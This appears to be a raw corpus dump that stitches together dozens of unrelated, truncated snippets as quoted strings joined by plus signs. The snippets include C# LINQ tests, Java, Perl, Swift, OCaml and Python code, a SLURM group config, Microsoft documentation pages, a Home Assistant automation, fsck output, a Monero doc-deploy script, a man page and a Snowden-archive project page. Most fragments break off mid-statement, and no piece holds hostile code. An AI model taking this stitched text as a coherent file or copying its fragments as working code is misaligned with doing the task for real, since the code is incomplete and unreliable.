products.AsQueryable();\n\n IQueryable pagedQueryable = productsQueryable.PageBy(0, 2);\n\n pagedQueryable.ToList().Count.ShouldBe(2);\n }\n\n [Fact]\n public void WhereIf_should_work()\n {\n var products = new List\n {\n new Product { Name = \"Oguzhan\" },\n new Product { Name = \"Soykan\" }\n };\n\n IQueryable productsQueryable = products.AsQueryable();\n\n IQueryable pagedQueryable = productsQueryable.WhereIf(products.Count == 2, (product, i) => product.Name == \"Oguzhan\");\n\n pagedQueryable.ToList().Count.ShouldBe(1);\n }\n\n [Fact]\n public void WhereIf_should_wor2k()\n {\n var products = new List\n {\n new Product { Name = \"Oguzhan\" },\n new Product { Name = \"Soykan\" }\n };\n\n IQueryable productsQueryable = products.AsQueryable();\n\n IQueryable pagedQueryable = productsQueryable.WhereIf(products.Count == 2, product => product.Name == \"Oguzhan\");\n\n pagedQueryable.ToList().Count.ShouldBe(1);\n }\n\n private class Product\n {\n public string Name { get; set; }\n }\n }\n}" +"package org.geogebra.common.kernel.arithmetic.variable;\n\nimport org.geogebra.common.kernel.Kernel;\nimport org.geogebra.common.kernel.arithmetic.ExpressionValue;\nimport org.geogebra.common.kernel.arithmetic.FunctionVariable;\nimport org.geogebra.common.kernel.geos.GeoElement;\nimport org.geogebra.common.kernel.parser.FunctionParser;\n\nclass DerivativeCreator {\n\n\tprivate Kernel kernel;\n\n\tDerivativeCreator(Kernel kernel) {\n\t\tthis.kernel = kernel;\n\t}\n\n\tExpressionValue getDerivative(String funcName) {\n\t\tint index = funcName.length() - 1;\n\t\tint order = 0;\n\t\twhile (index >= 0 && funcName.charAt(index) == '\\'') {\n\t\t\torder++;\n\t\t\tindex--;\n\t\t}\n\t\tGeoElement geo = null;\n\t\tboolean hasGeoDerivative = false;\n\t\twhile (index < funcName.length() && !hasGeoDerivative) {\n\t\t\tString label = funcName.substring(0, index + 1);\n\t\t\tgeo = kernel.lookupLabel(label);\n\t\t\thasGeoDerivative = geo != null && hasDerivative(geo);\n\t\t\t// stop if f' is defined but f is not defined, see #1444\n\t\t\tif (!hasGeoDerivative) {\n\t\t\t\torder--;\n\t\t\t\tindex++;\n\t\t\t}\n\t\t}\n\n\t\tif (hasGeoDerivative) {\n\t\t\treturn FunctionParser.derivativeNode(kernel, geo, order,\n\t\t\t\t\tgeo.isGeoCurveCartesian(), new FunctionVariable(kernel));\n\t\t}\n\t\treturn null;\n\t}\n\n\tprivate boolean hasDerivative(GeoElement geoElement) {\n\t\treturn geoElement.isRealValuedFunction() || geoElement.isGeoCurveCartesian();\n\t}\n}" +"#!/bin/sh\nexec perl -x $0 $*; echo \"Could not exec perl!\"; exit 1\n# The line above allows perl to be anywhere, as long as it's in your\n# PATH environment variable.\n\n#!perl\n#\n# fix-titles.pl\n# $Id$\n#\n# The HTML stylesheet likes to print html has the ends of tags on a different\n# line, like this:\n# FreeBSD\n#\n# Glimpse, which is indexing our website, finds this very confusing and\n# it cannot pick out the title from this mess. This script takes a list\n# of HTML files on the command line and attempts to make the tag\n# look more normal so that glimpse can understand it.\n#\n# WARNING: This is a hack. It's made to work on docbook generated html, but\n# may do strange things on anything else.\n\nuse strict;\n\nforeach my $file (@ARGV) {\n print \"Fixing $file\\n\";\n rename $file, \"$file.orig\";\n open (IN, \"$file.orig\") || die \"open $file.orig\";\n open (OUT, \">$file\") || die \"open $file for writing\";\n while (<IN>) {\n if (/^<HTML$/) {\n print OUT \"<HTML>\\n\";\n } elsif (/^><HEAD$/) {\n print OUT \"<HEAD>\\n\";\n } elsif (/^><TITLE$/) {\n print OUT \"<TITLE>\";\n } elsif" +"// sourcery:file: skipEquality\nimport Foundation\n\n/// Class that represents a project element.\npublic class PBXObject: Hashable, Decodable, Equatable, AutoEquatable {\n /// Returns the unique identifier.\n /// Note: The unique identifier of an object might change when the project gets written.\n /// If you use this identifier from a scheme, make sure the project is written before the project is.\n public var uuid: String {\n reference.value\n }\n\n /// The object reference in the project that contains it.\n let reference: PBXObjectReference\n\n /**\n Used to differentiate this object from other equatable ones for the purposes of uuid generation.\n\n This shouldn't be required to be set in normal circumstances.\n In some rare cases xcodeproj doesn't have enough context about otherwise equatable objects,\n so it has to resolve automatic uuid conflicts by appending numbers.\n This property can be used to provide more context to disambiguate these objects,\n which will result in more deterministic uuids.\n */\n public var context: String?\n\n // MARK: - Init\n\n init() {\n reference = PBXObjectReference()\n reference.setObject(self)\n }\n\n // MARK: - Decodable\n\n fileprivate enum CodingKeys: String, CodingKey {\n case reference\n }\n\n /// Initializes the object from its project representation.\n ///\n /// - Parameter decoder: XcodeprojPropertyListDecoder decoder.\n /// - Throws: an error if the" +"# Additional ClusterShell group source config file\n#\n# Please see `man 5 groups.conf` for further details.\n#\n\n#\n# SLURM partition bindings\n#\n[slurmpart,sp]\nmap: sinfo -h -o \"%N\" -p $GROUP\nall: sinfo -h -o \"%N\"\nlist: sinfo -h -o \"%R\"\nreverse: sinfo -h -N -o \"%R\" -n $NODE\n\n#\n# SLURM state bindings\n#\n[slurmstate,st]\nmap: sinfo -h -o \"%N\" -t $GROUP\nall: sinfo -h -o \"%N\"\nlist: sinfo -h -o \"%T\" | tr -d '*~#$@+'\nreverse: sinfo -h -N -o \"%T\" -n $NODE | tr -d '*~#$@+'\ncache_time: 60\n\n#\n# SLURM job bindings\n#\n[slurmjob,sj]\nmap: squeue -h -j $GROUP -o \"%N\"\nlist: squeue -h -o \"%i\" -t R\nreverse: squeue -h -w $NODE -o \"%i\"\ncache_time: 60\n\n#\n# SLURM user bindings for running jobs\n#\n[slurmuser,su]\nmap: squeue -h -u $GROUP -o \"%N\" -t R\nlist: squeue -h -o \"%u\" -t R\nreverse: squeue -h -w $NODE -o \"%u\"\ncache_time: 60" +"---\nDescription: Controlling Filter Graphs Using C\nms.assetid: 56e41f0a-2ea6-422c-8d3f-7849e91e3731\ntitle: Controlling Filter Graphs Using C\nms.topic: article\nms.date: 05/31/2018\n---\n\n# Controlling Filter Graphs Using C\n\nIf you are writing a DirectShow application in C (rather than C++), you must use a vtable pointer to call methods. The following example illustrates how to call the **IUnknown::QueryInterface** method from an application written in C:\n\n\n```C++\npGraph->lpVtbl->QueryInterface(pGraph, &IID_IMediaEvent, (void **)&pEvent);\n```\n\n\n\nThe following shows the equivalent call in C++:\n\n\n```C++\npGraph->QueryInterface(IID_IMediaEvent, (void **)&pEvent);\n```\n\n\n\nIn C, COM interfaces are defined as structures. The **lpVtbl** member is a pointer to a table of interface methods (the vtable). All methods take an additional parameter, which is a pointer to the interface.\n\n## Related topics\n\n<dl> <dt>\n\n[Appendixes](appendixes.md)\n</dt> </dl>" +"(** \n Functions to optimize vine expressions.\n \n Basically, constant_fold will only perform constant folding, whereas\n simplify() will also perform alpha substitution.\n \n Original author: Ivan Jager\n *)\n\nopen ExtList\nopen Vine\nopen Vine_util\n\nmodule D = Debug.Make(struct let name = \"Vine_opt\" and default=`NoDebug end)\nopen D\n\nmodule VH = Vine.VarHash\n\n\ntype alias = MayAlias | DoesAlias | PartialAlias | NoAlias\n\n\n(* some helper functions *)\n\n(* These fix* functions are duplicated from\n Execution.exec_utils. That's not ideal, but I'm not sure of a better\n place. *)\nlet fix_u1 x = Int64.logand x 0x1L\nlet fix_u8 x = Int64.logand x 0xffL\nlet fix_u16 x = Int64.logand x 0xffffL\nlet fix_u32 x = Int64.logand x 0xffffffffL\n\nlet fix_s1 x = Int64.shift_right (Int64.shift_left x 63) 63\nlet fix_s8 x = Int64.shift_right (Int64.shift_left x 56) 56\nlet fix_s16 x = Int64.shift_right (Int64.shift_left x 48) 48\nlet fix_s32 x = Int64.shift_right (Int64.shift_left x 32) 32\n\n(* drop high bits *)\nlet to64 v =\n match v with\n\tInt(t,i) -> let bits = 64 - bits_of_width t in\n\t Int64.shift_right_logical (Int64.shift_left i bits) bits\n | _ -> raise (Invalid_argument \"to64 is only for integers\")\n\n(* sign extend to 64 bits*)\nlet tos64 v =\n match v with\n\tInt(t,i) -> let" +"import networkx as nx\nimport random\nimport time\nfrom networkx.classes.function import is_directed\n\nfrom networkx.algorithms.isomorphism.tree_isomorphism import (\n rooted_tree_isomorphism,\n tree_isomorphism,\n)\n\n\n# have this work for graph\n# given two trees (either the directed or undirected)\n# transform t2 according to the isomorphism\n# and confirm it is identical to t1\n# randomize the order of the edges when constructing\ndef check_isomorphism(t1, t2, isomorphism):\n\n # get the name of t1, given the name in t2\n mapping = {v2: v1 for (v1, v2) in isomorphism}\n\n # these should be the same\n d1 = is_directed(t1)\n d2 = is_directed(t2)\n assert d1 == d2\n\n edges_1 = []\n for (u, v) in t1.edges():\n if d1:\n edges_1.append((u, v))\n else:\n # if not directed, then need to\n # put the edge in a consistent direction\n if u < v:\n edges_1.append((u, v))\n else:\n edges_1.append((v, u))\n\n edges_2 = []\n for (u, v) in t2.edges():\n # translate to names for t1\n u = mapping[u]\n v = mapping[v]\n if d2:\n edges_2.append((u, v))\n else:\n if u < v:\n edges_2.append((u, v))\n else:\n edges_2.append((v, u))\n\n return sorted(edges_1) == sorted(edges_2)\n\n\ndef test_hardcoded():\n\n print(\"hardcoded test\")\n\n # define a test problem\n edges_1 = [\n (\"a\", \"b\"),\n (\"a\", \"c\"),\n (\"a\", \"d\"),\n (\"b\", \"e\"),\n (\"b\", \"f\"),\n (\"e\", \"j\"),\n (\"e\", \"k\"),\n (\"c\"," +"(* See docs/unittests.md for documentation on how to use this. *)\n\nlet domTests = ref false\n\nlet process_cmdline_args () =\n let command = ref None in\n Tc.Array.iter Sys.argv ~f:(fun str ->\n match (!command, str) with\n | None, \"--pattern\" ->\n command := Some str\n | None, \"--dom\" ->\n domTests := true\n | None, \"--verbose\" ->\n Tester.verbose := true\n | None, \"--help\" ->\n Js.log\n \"Run Dark's client-side unit tests. Supported arguments:\\n --dom: run the DOM tests (slow)\\n --verbose: print test names\\n --help: Print this message\\n --pattern 'some-regex': Run any test that contains this regex\" ;\n exit 0\n | Some \"--pattern\", str ->\n Tester.pattern := Some (Js.Re.fromString str) ;\n command := None\n | None, _ when Tc.String.endsWith str ~suffix:\"unittests.bs.js\" ->\n (* ignore the filename *)\n ()\n | None, \"/usr/bin/node\" ->\n (* ignore *)\n ()\n | _ ->\n Js.log (\"Unsupported command line argument: \" ^ str))\n\n\n(* See docs/unittests.md for documentation on how to use this. *)\nlet () =\n let open Tester in\n process_cmdline_args () ;\n describe \"Analysis_test\" Analysis_test.run ;\n describe \"APIError test\" Api_error_test.run ;\n describe \"Ast_test\" Ast_test.run ;\n describe \"Autocomplete_test\" Autocomplete_test.run ;\n describe \"Curl_test\" Curl_test.run ;\n describe \"Darkstorage_test\" Darkstorage_test.run ;\n describe \"Encoder test\" Encoder_test.run ;\n describe \"Feature Flag test\" Feature_flag_test.run ;\n describe" +"% Generated by roxygen2: do not edit by hand\n% Please edit documentation in R/moga.R\n\\name{moga}\n\\alias{moga}\n\\title{Make Oxygen Great Again}\n\\usage{\nmoga(path, ..., force.fields = NULL, dry.run = TRUE, overwrite = FALSE)\n}\n\\arguments{\n\\item{path}{character path to R file}\n\n\\item{\\dots}{arguments to be passed to new makeOxygen}\n\n\\item{force.fields}{character, vector a field names that are in current header that are to be updated Default: NULL}\n\n\\item{dry.run}{boolean, write lines to console the output, Default: TRUE}\n\n\\item{overwrite}{boolean, overwrite contents of input file, Default: FALSE}\n}\n\\value{\ncharacter\n}\n\\description{\nUpdate/append an R file that has roxygen2 headers already with updated information\n}\n\\details{\nCross references fields already in the roxygen2 header and adds any new ones from the updated call.\nTo force a change to a field add field name to force.fields.\n}\n\\examples{\n\n# We want to update the contents of the Roxygen2 with the new parameter \"b\"\n# without touching the other fields\n\n# Before\n cat(readLines(system.file('example_moga.R',package = 'sinew')),sep = '\\n')\n\n# After\n moga(system.file('example_moga.R',package = 'sinew'))\n \n}\n\\concept{populate}" +"#\n# Turn off the television if nobody seems to be home.\n#\n# @subscribe group.presence\n# @subscribe group.motion_sensors\n# @subscribe switch.lounge_tv\n#\n# @publish switch.lounge_tv\n#\n\n- id: tv_off\n alias: \"Television OFF\"\n\n trigger:\n # No known person is home.\n - platform: state\n entity_id: group.presence\n to: 'not_home'\n for:\n hours: 2\n\n # Motion is no longer detected.\n - platform: state\n entity_id: group.motion_sensors\n to: 'off'\n for:\n hours: 2\n\n condition:\n # If TV is on.\n - condition: state\n entity_id: switch.lounge_tv\n state: 'on'\n\n # No known person is home.\n - condition: state\n entity_id: group.presence\n state: 'not_home'\n for:\n hours: 2\n\n # No motion has been detected.\n - condition: state\n entity_id: group.motion_sensors\n state: 'off'\n for:\n hours: 2\n\n action:\n # Turn off the TV.\n - service: homeassistant.turn_off\n data:\n entity_id:\n - switch.lounge_tv" +"---\ntitle: Format of a Text Log Section Header\ndescription: Format of a Text Log Section Header\nms.assetid: ec46a540-e888-426d-85fc-6ad2d756c7b8\nkeywords:\n- section headers WDK SetupAPI logging\n- formats WDK SetupAPI logging\n- text logs WDK SetupAPI , section header\nms.date: 04/20/2017\nms.localizationpriority: medium\n---\n\n# Format of a Text Log Section Header\n\n\nA *text log section header* consists of two log entries. The format of the first entry includes a \">>> \" prefix string, followed by a *section_title* field and an *instance_identifier* field. In the following example, the text in italic font style is a placeholder for section-specific text that is supplied by a section creator, and the text in bold font style is supplied by SetupAPI logging.\n\n```cpp\n>>> [section_title - instance_identifier] \n```\n\nThe *section_title* field is always present and provides a title for the operation that is associated with the section.\n\nThe *instance_identifier* provides an identifier that, ideally, uniquely identifies the instance of the operation. If the *instance_identifier* field is not present, the format of the first entry of a section header is as follows:\n\n```cpp\n>>> [section_title] \n```\n\nThe format of the second entry of a section header includes a \">>> \" prefix string, followed by a" +"---\nauthor:\n name: Linode\n email: docs@linode.com\ndescription: \"Clojure is a general-purpose programming language with an emphasis on functional programming. It is a dialect of the Lisp programming language running on the Java Virtual Machine (JVM). While Clojure allows you to write elegant and concise code, its ability to make use of the existing JVM infrastructure, such as libraries, tools and application servers, makes it also a very practical choice.\"\nog_description: 'Clojure is a general-purpose programming language with an emphasis on functional programming. It is a dialect of the Lisp programming language running on the Java Virtual Machine (JVM). While Clojure allows you to write elegant and concise code, its ability to make use of the existing JVM infrastructure, such as libraries, tools and application servers, makes it also a very practical choice.'\nkeywords: [\"clojure\", \"java virtual machine\", \"jvm\"]\nlicense: '[CC BY-ND 4.0](https://creativecommons.org/licenses/by-nd/4.0)'\npublished: 2020-08-31\ntitle: Clojure\nshow_in_lists: true\n---" +"nnForge\n=======\n\n[nnForge](http://nnforge.org) is a library for training convolutional and fully-connected neural networks. It includes CPU and GPU (CUDA) backends.\nIt is an open-source software distributed under the [Apache License v2.0](http://www.apache.org/licenses/LICENSE-2.0).\n\nAuthors\n-------\nnnForge is designed and implemented by [Maxim Milakov](http://milakov.org).\n\nBuild\n-----\n\n1. Check Settings.mk file, you might need to make some changes to it:\n\t* Define paths to [Boost](http://www.boost.org/), [OpenCV](http://opencv.org/), and [Protobuf](https://developers.google.com/protocol-buffers/) installations nnForge depends on if you have them installed in non-default locations.\n\t* Enable or disable CUDA backend - you will need to disable it if you don't have [CUDA toolkit](https://developer.nvidia.com/cuda-toolkit) and [cuDNN](https://developer.nvidia.com/cuDNN) v4 installed.\n2. Run \"./make_all.sh\". This should build the library and the examples. All the arguments are passed to make, thus you might speed up the build process by specifying -j argument with the number of parallel jobs. The build process might take about 5 minutes on a modern desktop.\n3. Library files are in lib/ directory once build process successfuly finishes.\n4. Examples provided in examples/ directory are built into bin/. Configuration files needed to run those apps are put there as well.\n\nRun examples\n------------\n\nEach example contains its own README with instructions on how to get input data and run" +"Pass 1: Checking inodes, blocks, and sizes\nSpecial (device/socket/fifo) inode 12 has non-zero size. Fix? yes\n\nInode 12, i_blocks is 2, should be 0. Fix? yes\n\nPass 2: Checking directory structure\nEntry 'dir' in / (2) has an incorrect filetype (was 2, should be 6).\nFix? yes\n\nEntry '..' in <12>/<13> (13) has an incorrect filetype (was 2, should be 6).\nFix? yes\n\nEntry '..' in <12>/<14> (14) has an incorrect filetype (was 2, should be 6).\nFix? yes\n\nEntry '..' in <12>/<15> (15) has an incorrect filetype (was 2, should be 6).\nFix? yes\n\nPass 3: Checking directory connectivity\nUnconnected directory inode 13 (<12>/<13>)\nConnect to /lost+found? yes\n\nUnconnected directory inode 14 (<12>/<14>)\nConnect to /lost+found? yes\n\nUnconnected directory inode 15 (<12>/<15>)\nConnect to /lost+found? yes\n\nPass 4: Checking reference counts\nInode 2 ref count is 4, should be 3. Fix? yes\n\nInode 12 ref count is 2, should be 1. Fix? yes\n\nInode 13 ref count is 3, should be 2. Fix? yes\n\nInode 14 ref count is 3, should be 2. Fix? yes\n\nInode 15 ref count is 3, should be 2. Fix? yes\n\nPass 5: Checking group summary information\nBlock bitmap differences: -23\nFix? yes\n\nFree" +"#pragma once\r\n\r\nnamespace SipServer {\r\n\r\n/**\r\n * \u5904\u7406\u63a5\u6536\u7684\u6d88\u606f\uff0c\u89e3\u6790\u53ca\u5e94\u7b54\u3002\u53d1\u9001message\u8bf7\u6c42(\u67e5\u8be2\u76ee\u5f55\u3001\u4e91\u53f0\u63a7\u5236)\r\n */\r\nclass CSipMessage\r\n{\r\npublic:\r\n\r\n /**\r\n * \u5904\u7406Message\u4e8b\u4ef6\r\n */\r\n void OnMessage(eXosip_event_t *osipEvent);\r\n\r\n /**\r\n * \u76ee\u5f55\u67e5\u8be2\r\n */\r\n void QueryDirtionary();\r\n\r\n /**\r\n * \u8bbe\u5907\u72b6\u6001\u67e5\u8be2\r\n * @param devID[in] \u8bbe\u5907id\r\n */\r\n void QueryDeviceStatus(string devID);\r\n\r\n /**\r\n * \u8bbe\u5907\u4fe1\u606f\u67e5\u8be2\u8bf7\u6c42\r\n * @param devID[in] \u8bbe\u5907id\r\n */\r\n void QueryDeviceInfo(string devID);\r\n\r\n /**\r\n * \u6587\u4ef6\u76ee\u5f55\u68c0\u7d22\u8bf7\u6c42\r\n * @param devID[in] \u8bbe\u5907id\r\n */\r\n void QueryRecordInfo(string devID, string strStartTime, string strEndTime);\r\n\r\n /**\r\n * \u79fb\u52a8\u8bbe\u5907\u4f4d\u7f6e\u67e5\u8be2\r\n * @param devID[in] \u8bbe\u5907id\r\n */\r\n void QueryMobilePosition(string devID);\r\n\r\n /**\r\n * \u4e91\u53f0\u63a7\u5236\r\n * @param strDevCode[in] \u8bbe\u5907\u7f16\u7801\r\n * @param nInOut[in] \u955c\u5934\u653e\u5927\u7f29\u5c0f 0:\u505c\u6b62 1:\u7f29\u5c0f 2:\u653e\u5927\r\n * @param nUpDown[in] \u955c\u5934\u4e0a\u79fb\u4e0b\u79fb 0:\u505c\u6b62 1:\u4e0a\u79fb 2:\u4e0b\u79fb\r\n * @param nLeftRight[in] \u955c\u5934\u5de6\u79fb\u53f3\u79fb 0:\u505c\u6b62 1:\u5de6\u79fb 2:\u53f3\u79fb\r\n * @param cMoveSpeed[in] \u955c\u5934\u7f29\u653e\u901f\u5ea6\r\n * @param cMoveSpeed[in] \u955c\u5934\u79fb\u52a8\u901f\u5ea6\r\n */\r\n void DeviceControl(string strDevCode,\r\n int nInOut = 0, int nUpDown = 0, int nLeftRight = 0, \r\n uint8_t cInOutSpeed = 0X1, uint8_t cMoveSpeed = 0XFF);\r\n\r\n};\r\n\r\n};" +"#!/bin/bash -e\n\n# maintainer (ask me any questions): rfree\n\nif [[ ! -r \"Doxyfile\" ]] ; then\n\techo \"Error, can not read the Doxyfile - make sure to run this script from top of monero project, where the Doxyfile file is located\"\n\texit 1\nfi\n\nwwwdir=\"$HOME/monero-www/\"\nif [[ ! -w \"$wwwdir\" ]] ; then\n\techo \"Error, can not write into wwwdir=$wwwdir. It should be a directory readable/connected to your webserver, or a symlink to such directory\"\n\texit 1\nfi\n\nif [[ ! -d \"$wwwdir/doc\" ]] ; then\n\techo \"Creating subdirs\"\n\tmkdir \"$wwwdir/doc\"\nfi\n\necho \"Generating:\"\ndoxygen Doxyfile && echo \"Backup previous version:\" && rm -rf ~/monero-www-previous && mv \"$wwwdir/doc\" ~/monero-www-previous && cp -ar doc/ \"$wwwdir/\" && echo \"Done, builded and copied to public - the doxygen docs\" && echo \"size:\" && du -Dsh \"$wwwdir/\" && echo \"files:\" && find \"$wwwdir/\" | wc -l" +".\\\" generated with Ronn/v0.7.3\n.\\\" http://github.com/rtomayko/ronn/tree/0.7.3\n.\n.TH \"SOCKETMASTER\" \"1\" \"December 2013\" \"PandaStream\" \"\"\n.\n.SH \"NAME\"\n\\fBsocketmaster\\fR \\- Zero downtime restart for your apps\n.\n.SH \"SYNOPSIS\"\n\\fBsocketmaster\\fR [\\-listen=URI] [\\-command=PATH] [\\-start=MILLIS] [\\-syslog]\n.\n.SH \"DESCRIPTION\"\nsocketmaster is a generic solution to the restart problem: you want to restart your app but neither lose any active connection nor refuse new connections\\.\n.\n.P\nsocketmaster opens the socket you want to listen on and passes it onto your program\\. Because socketmaster is simple enough it doesn\\'t need to be restarted and can keep your file\\-descriptor indefinitely open\\.\n.\n.TP\n\\fB\\-command\\fR=PATH\nDefines the location of the program to execute and pass the file\\-descriptor onto\\. If you need to add arguments to the program use a wrapper script\\.\n.\n.TP\n\\fB\\-listen\\fR=URI\nOne of the following schemes are accepted: tcp, tcp4, tcp6 and unix\\. Example: tcp4://localhost:8945 or unix:///tmp/myapp\\.sock\n.\n.TP\n\\fB\\-start\\fR=MILLIS\nDetermines how long socketmaster waits before signaling the old process\\. If MILLIS is set to zero that feature is disabled\\.\n.\n.TP\n\\fB\\-syslog\\fR\nTells socketmaster to log to syslog\\.\n.\n.TP\n\\fB\\-user\\fR=LOGIN\nSets the child process\\'s uid/gid to the given user (looked up in /etc/passwd)\\. This command only works when socketmaster is run" +"import React, {useState} from 'react'\n\nimport {useAppState, getBoardPackage} from '../state'\nimport {Button, Icon} from '../ui'\nimport {FileEvent} from '../types'\nimport OpenFileDrawer from './OpenFileDrawer'\n\nconst DOWNLOAD_TOOLTIP = 'Download SVG renders'\nconst UPLOAD_TOOLTIP = 'Upload Gerber/drill files'\n\nexport type FileControlsProps = {\n buttonClassName: string\n handleFiles: (event: FileEvent) => void\n handleUrl: (url: string) => void\n}\n\nexport default function FileControls(props: FileControlsProps): JSX.Element {\n const {board, loading, downloading, dispatch} = useAppState()\n const [open, setOpen] = useState(false)\n const {buttonClassName} = props\n\n const toggleUploadOpen = (): void => setOpen(!open)\n\n const handleFiles = (event: FileEvent): void => {\n setOpen(false)\n props.handleFiles(event)\n }\n\n const handleUrl = (url: string): void => {\n setOpen(false)\n props.handleUrl(url)\n }\n\n const downloadBoard = (): void => {\n if (board) {\n dispatch(getBoardPackage(board.id))\n }\n }\n\n return (\n <>\n <Button\n className={buttonClassName}\n onClick={toggleUploadOpen}\n disabled={loading}\n title={UPLOAD_TOOLTIP}\n >\n <Icon name=\"plus\" />\n </Button>\n <Button\n className={buttonClassName}\n onClick={downloadBoard}\n disabled={!board || downloading}\n title={DOWNLOAD_TOOLTIP}\n >\n <Icon\n name={downloading ? 'spinner' : 'file-download'}\n faProps={{pulse: downloading}}\n />\n </Button>\n <OpenFileDrawer\n open={open}\n handleFiles={handleFiles}\n handleUrl={handleUrl}\n close={toggleUploadOpen}\n />\n </>\n )\n}" +" <div class=\"container\">\n <div class=\"col-md-10 col-md-offset-1 static-page\">\n\n <h1>About the Project</h1>\n\n <p>The Snowden Document Search aims to provide a comprehensive, easy-to-use search that draws upon all text from available Snowden documents. The search is based upon the most complete archive of Snowden documents to date. It is meant to encourage users to explore the documents through its extensive filtering capabilities. While users are able to search specifically by title, description, document, document date, and release date, categories also allow filtering by agency, codeword, document topic, countries mentioned, SIGADS, classification, and countries shared with. Results contain not only full document text, pdf, and description, but also links to relevant articles and basic document data, such as codewords used and countries mentioned within the document.</p>\n \n <p>This project is a collaboration between <a href=\"https://couragefound.org\" target=\"_blank\">Courage Foundation</a> and <a href=\"https://transparencytoolkit.org\" target=\"_blank\">Transparency Toolkit</a>. Courage Foundation's <a href=\"https://edwardsnowden.com\" target=\"_blank\">Edward Snowden Defence Fund</a> maintains the most comprehensive archive of documents and major news stories that have come out following the whistleblowing efforts of Edward Snowden. This archive was the first comprehensive database of Snowden documents initiated and it aims to preserve the historical impact of the documents. Transparency Toolkit and Courage have used the archive to categorise the documents" +"/* common.h\n Mathieu Stefani, 12 August 2015\n \n A collection of macro / utilities / constants\n*/\n\n#pragma once\n\n#include <sstream>\n#include <cstdio>\n#include <cassert>\n#include <cstring>\n#include <stdexcept>\n\n#include <netdb.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n\n#define unsafe\n\n#define TRY(...) \\\n do { \\\n auto ret = __VA_ARGS__; \\\n if (ret < 0) { \\\n const char* str = #__VA_ARGS__; \\\n std::ostringstream oss; \\\n oss << str << \": \"; \\\n if (errno == 0) { \\\n oss << gai_strerror(ret); \\\n } else { \\\n oss << strerror(errno); \\\n } \\\n throw std::runtime_error(oss.str()); \\\n } \\\n } while (0)\n\n#define TRY_RET(...) \\\n [&]() { \\\n auto ret = __VA_ARGS__; \\\n if (ret < 0) { \\\n const char *str = #__VA_ARGS__; \\\n std::ostringstream oss; \\\n oss << str << \": \" << strerror(errno); \\\n throw std::runtime_error(oss.str()); \\\n } \\\n return ret; \\\n }(); \\\n (void) 0\n\n#define unreachable() __builtin_unreachable()\n\nnamespace Pistache {\nnamespace Const {\n\n static constexpr int MaxBacklog = 128;\n static constexpr int MaxEvents = 1024;\n static constexpr int MaxBuffer = 4096;\n static constexpr int ChunkSize = 1024;\n} // namespace Const\n} // namespace Pistache" +"import { clamp } from '../utils';\nimport { alpha as alphaType, number } from './numbers';\nimport { percent } from './units';\nimport { Color, RGBA, HSLA, NumberMap, ValueType } from '../types';\nimport { sanitize, singleColorRegex } from '../utils';\n\n/*\n Get value from function string\n \"translateX(20px)\" -> \"20px\"\n*/\nexport const getValueFromFunctionString = (value: string) =>\n value.substring(value.indexOf('(') + 1, value.lastIndexOf(')'));\n\nconst clampRgbUnit = clamp(0, 255);\n\n// Prefer speed over completeness\nconst isRgba = (v: Color): v is RGBA => (v as RGBA).red !== undefined;\nconst isHsla = (v: Color): v is HSLA => (v as HSLA).hue !== undefined;\n\n/**\n * Creates a function that will split color\n * values from string into an object of properties\n * `mapArrayToObject(['red', 'green', 'blue'])('rgba(0,0,0)')`\n */\nconst splitColorValues = (terms: string[]) => {\n return (v: string | RGBA | HSLA) => {\n if (typeof v !== 'string') return v;\n const values: NumberMap = {};\n const valuesArray = getValueFromFunctionString(v).split(/,\\s*/); // Split '0,0' into ['0','0']\n\n // 4 because there are four props in each color type\n for (let i = 0; i < 4; i++) {\n // If this value is undefined return 1 - this is usually undefined alpha\n values[terms[i]] =\n valuesArray[i] !== undefined ? parseFloat(valuesArray[i]) :" +"# ROS integration example\n## Prerequisites\nThis example has updated to compatible with ROS melodic and Gazebo9. If you still using ROS Indogo and Gazebo2, you have to reset the commit back to https://github.com/meco-group/omg-tools/commit/beb4d3c78d2fb269671fde783b234d727b9c1fa1, because there are differences in xacro programming style between two versions. Please also check the previous README for usage if you reset the commit.\n\n\nMake sure you have the ROS packages *ros-control* and *ros-controllers*:\n```\n$ sudo apt install ros-melodic-ros-control ros-melodic-ros-controllers\n```\nFor motion planner algorithm, recommended linear solver library is 'ma57', but this library is not available through 'apt' or 'pip', you have to compile it yourself, Please check https://github.com/casadi/casadi/wiki/Obtaining-HSL if you are interest. To check whether 'ma57' is available in your computer, you can run:\n```\npython /examples/p2p_agv.py\n```\nto see if it complains about the 'ma57' library missing.\n\n\nThe substitution of 'ma57' is 'mumps', this changes already adressed here. 'mumps' is available through 'apt'\n```\nsudo apt install libmumps-dev\n```\nIf you have 'ma57' library in your computer, go to line 77 and 82 in 'motionplanner.py', change the 'mumps' to 'ma57' to make palnner running faster.\n\n## Building the example\nIn the current folder (the one containing this readme):\n\n```\n$ catkin_make\n$" +"#include <bits/stdc++.h>\nusing namespace std;\n\n/*\n1. \u6570\u503c\u8f6c\u6362\uff0c\u6ce8\u610f\u5224\u65ad\u5408\u6cd5\u6027\u548c\u6b63\u786e\u8f6c\u6362\n2. number\u662f\u5426\u9700\u8981\u52a0s\n*/\n\nbool convert(string num, double &r) {\n int op = 1, p = 0;\n if (num[p] == '-') { op = -1; p++; }\n int pointNum = 0, pointPos = num.size();\n bool ok = true;\n for (int i = p; i < num.size() && ok; i++) {\n if (num[i] == '.') {\n pointNum++;\n if (pointNum > 1) ok = false;\n pointPos = i;\n continue;\n }\n if (!(num[i] <= '9' && num[i] >= '0')) ok = false;\n }\n if (!ok || (num.size() != pointPos && (num.size() - pointPos - 1) > 2)) {\n cout << \"ERROR: \" << num << \" is not a legal number\" << endl;\n return false;\n } else {\n r = 0.0;\n for (int i = 0; i < pointPos - p; i++)\n r = r * 10 + num[p+i] - '0';\n double s = 0;\n for (int i = 0; i < (int)num.size()-pointPos-1; i++) {\n s = s * 10 + num[pointPos + i + 1] - '0';\n }\n s /= pow(10, (int)num.size()-pointPos-1);\n r += s;\n r *= op;\n if (r < -1000 || r > 1000) {\n cout << \"ERROR: \" << num << \"" +"Registering Apps with Indivo\n============================\n\nAs of version 2.0, Indivo has an official process for adding and managing apps on a given instance. For those of you\nfamiliar with using ``indivo_data.xml`` for adding apps, the ``<machine_apps>`` and ``<user_apps>`` tags will no longer\nbe respected, and will not add apps to Indivo.\n\nApp Manifests\n-------------\n\nPrevious releases of Indivo have relied on an implicit XML syntax in ``indivo_data.xml`` for representing an app within\nIndivo. Now, applications must provide a declared manifest describing the application and its requirements. We have \nadopted the `SMART Project's <http://smartplatforms.org>`_ syntax for describing apps in manifests, but have added some\nIndivo-specific parameters to accommodate the way Indivo represents applications. For compatibility, any valid SMART \nmanifest will also be a valid Indivo 